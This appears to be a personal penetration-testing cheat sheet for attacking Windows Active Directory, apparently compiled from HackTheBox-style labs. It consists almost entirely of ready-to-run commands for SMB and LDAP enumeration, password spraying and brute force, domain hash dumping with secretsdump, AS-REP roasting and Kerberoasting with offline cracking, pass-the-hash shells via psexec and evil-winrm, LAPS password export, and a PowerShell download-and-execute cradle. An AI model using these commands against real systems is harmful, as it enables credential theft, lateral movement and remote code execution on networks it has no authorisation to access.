# smb enum
- port 139 445
smbmap -H # no pwd
smbmap -H -d domain -u user -p pwd # pwd
smbclient -N -L \\\\ # no pwd
smbclient -N \\\\\\Shares # interactive
smbclient -W domain -U user //$ # pwd
enum4linux -a
msf5 auxiliary(scanner/smb/pipe_auditor) > run
msf5 auxiliary(scanner/smb/smb_lookupsid) > run
rpcclient -U bhult
> enumdomusers
> enumprivs
> enumprinters
- pwd spray
cme smb -d domain -u users.txt -p Password4
- brute
hydra -L users.lst -P wordlist.lst smb
- change pwd
smbpasswd -U bhult -r
- mount
mount -t cifs // /mnt/smb -v -o domain=dom,user=user,pass=pwd
- mount in win
net use j: \\hathor\share /u:windcorp.htb\BeatriceMill pwd
net use * /del /y

# ldap enum
- port 389 636 3268
nmap -sT -Pn -n --open -p389 --script ldap-rootdse
ldapsearch -x -h -D 'windcorp\BeatriceMill' -w 'pwd'  -b "CN=Users,DC=windcorp,DC=htb"
ldapsearch -x -h -p 389 -D 'domain\user' -w 'pwd' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountNamePage
GetADUsers.py -all active.htb/user:pwd -dc-ip
- export LAPS
cme ldap -u svc_deploy -p 'pwd' --kdcHost timelapse.htb -M laps

# dns enum
- port 53
dig srv _ldap._tcp.dc._msdcs.domain @

# kerberos
- port 88
kerbrute userenum -d spookysec.local --dc userlist.txt
- enum user hashes & kerberos keys
secretsdump.py spookysec.local/backup:pwd@<dc-ip> -just-dc  # exported hash can be used to get shell
- ASREPRoasting, Getting TGT for svc-admin
GetNPUsers.py -dc-ip spookysec.local/svc-admin -no-pass
- tgs/spn
GetUserSPNs.py domain/user:pass -dc-ip -request
john --wordlist=/usr/share/wordlists/rockyou.txt spn-admin.txt
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
- get shell
psexec.py domain/user:pwd@<ip>
psexec.py user@<ip> -hashes hash
smbexec.py domain/user@<ip> -hashes hash
wmiexec.py domain/user@<ip>

# winRM
- port 5985 5986
evil-winrm -i -u user -H hash
evil-winrm -i -u user -p 'pwd'
evil-winrm -i -S -c cert.crt -k prv.key

# common
- gen dict from url
cewl -d 5 -m 5 -w wordlist.lst url --with-numbers
- gpp Groups.xml crack
gpp-decrypt hash
- share files
smbserver.py tools .
copy \\\tools\file .
certutil -encode xx.zip encoded.txt
- download file
IEX(New-Object Net.WebClient).downloadString('')
- check NTLM hash
hashid 9cb01504ba0247ad5c6e08f7ccae7903
- show share
net view
- crack pfx pwd
crackpkcs12 -d /usr/share/wordlists/rockyou.txt x.pfx
- export cert from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
- export private key from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
- crack zip
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt orcharddb.zip